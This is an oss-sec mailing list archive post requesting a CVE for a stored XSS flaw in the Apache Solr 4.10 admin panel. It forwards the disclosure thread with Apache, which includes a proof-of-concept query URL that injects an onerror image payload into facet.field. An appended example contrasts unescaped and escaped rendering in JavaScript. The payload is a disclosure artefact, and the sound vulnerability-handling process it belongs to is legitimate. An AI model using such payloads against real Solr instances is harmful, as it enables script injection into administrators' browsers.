oss-sec mailing list archives
CVE Request - Apache Solr 4.10
From: Puneeth Gowda <puneethis021 () gmail com>
Date: Sun, 15 Mar 2015 14:30:44 +0530
Hi,

Please assign a CVE for this issue:

Software : Apache Solr
Version : 4.10

Thanks
Puneeth

FYI,

---------- Forwarded message ----------
From: Puneeth Gowda <puneethis021 () gmail com>
Date: Tue, Nov 18, 2014 at 8:30 AM
Subject: Re: Security Vulnerability in Solr v4.10
To: Stefan Matheis <steffkes () apache org>

Hello Stefan,

Patch is working fine. Issue has been fixed now.

Thanks
Puneeth

On Fri, Nov 14, 2014 at 1:51 AM, Stefan Matheis <steffkes () apache org> wrote:

Hi Puneeth

I'm really sorry about the late reply - this is my first CVE I'm handling, so I'm trying to do it properly and wanted to ensure that everything is working according to plans & ASF agenda.

The CVE you've asked about is CSV-2014-3628, the fix I was working on already is committed to trunk, you can have a look at the applied changes at https://issues.apache.org/jira/browse/SOLR-6738 .

I'd be happy to know if that covers all the cases you've discovered or if there are more that I've missed with this fix!

-Stefan

On Sunday, November 2, 2014 at 8:38 AM, Puneeth Gowda wrote:

Hi Stefan,

Thank you for your response. I'd really appreciate it if you could assign a CVE to this bug!

Thanks
puneeth

On Sun, Nov 2, 2014 at 4:52 AM, Stefan Matheis <steffkes () apache org> wrote:

Hi Puneeth

Sorry for the late response, thanks for reporting this vulnerability - I'm hereby acknowledging it on behalf of the Lucene PMC.

We have investigated your report and accept it. I'm already working on a fix.

-Stefan

-------- Original Message --------
Subject: Security Vulnerability in Solr v4.10
Date: Wed, 29 Oct 2014 16:57:06 +0530
From: Puneeth Gowda <puneethis021 () gmail com>
To: security () apache org

Hi,

I would like to report a stored xss vulnerability in solr web app version : 4.10

###################################################
Vulnerability Name : Stored XSS
Software : Apache Solr
Version : 4.10
###################################################

POC:

Steps:

1) Search with following query :

fq=lang%3A1&fq=%3A1&facet=true&facet.field="}<img src=a onerror=alert(xss)>&facet.date=dateline&facet.date.start=2006-01-01T00%3A00%3A00.000Z%2FDAY&facet.date.end=2014-01-20T00%3A00%3A00.000Z%2FDAY%2B1DAY&facet.date.gap=%2B1DAY&facet.mincount=1&f.title.facet.limit=20&json.nl=map&sort=dateline%20desc&rows=1&facet_ranges=&q=*:*&wt=json

Final URL :

http://localhost:8080/solr/<app>/select?fq=lang%3A1&fq=%3A1&facet=true&facet.field="}<img src=a onerror=alert(xss)>&facet.date=dateline&facet.date.start=2006-01-01T00%3A00%3A00.000Z%2FDAY&facet.date.end=2014-01-20T00%3A00%3A00.000Z%2FDAY%2B1DAY&facet.date.gap=%2B1DAY&facet.mincount=1&f.title.facet.limit=20&json.nl=map&sort=dateline%20desc&rows=1&facet_ranges=&q=*:*&wt=json

2) Now browse to Solr Admin panel URL: http://localhost:8080/solr/
Click on Plugins/stats after selecting <core> from the drop down.

Browser displays popup.

Reason : The parameter "fieldvalucache" stores all searched queries without sanitizing, which results in execution of javascript.

Thanks
Puneeth
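
Added example (not part of the thread and not Solr's admin UI code): the report's root cause is that a value taken from a search request is later written into the Plugins/Stats page without output encoding. The sketch below renders a constructed stats entry both ways and includes a regression check for a UI test suite; the function names and the shape of the stats object are assumptions made for illustration.

```javascript
// Constructed sample: cache statistics in which one entry name carries the
// facet.field value from the report. The object shape is assumed, not Solr's.
const sampleCacheStats = {
  'item_"}<img src=a onerror=alert(xss)>': "{field=title,memSize=4224}",
  lookups: "12",
};

// Encode the characters that are significant in HTML text and attribute values.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// "Before": names and values are concatenated into markup as-is, so a stored
// value containing a tag becomes a live element when the page is viewed.
function renderStatsUnsafe(stats) {
  return Object.entries(stats)
    .map(([name, value]) => `<dt>${name}</dt><dd>${value}</dd>`)
    .join("");
}

// "After": every untrusted string is encoded at the point of output.
function renderStatsSafe(stats) {
  return Object.entries(stats)
    .map(([name, value]) => `<dt>${escapeHtml(name)}</dt><dd>${escapeHtml(value)}</dd>`)
    .join("");
}

// Regression check: the rendered fragment may only contain <dt>/<dd> elements.
function hasUnexpectedTags(html) {
  const tags = html.match(/<\/?[a-zA-Z][^\s>\/]*/g) || [];
  return tags.some((tag) => !/^<\/?(dt|dd)$/i.test(tag));
}

console.log("unsafe render flagged:", hasUnexpectedTags(renderStatsUnsafe(sampleCacheStats)));
console.log("safe render flagged:  ", hasUnexpectedTags(renderStatsSafe(sampleCacheStats)));
```

Encoding at output time protects the page regardless of what earlier requests left in the cache, which is why the check is applied to the rendered markup rather than to the incoming query.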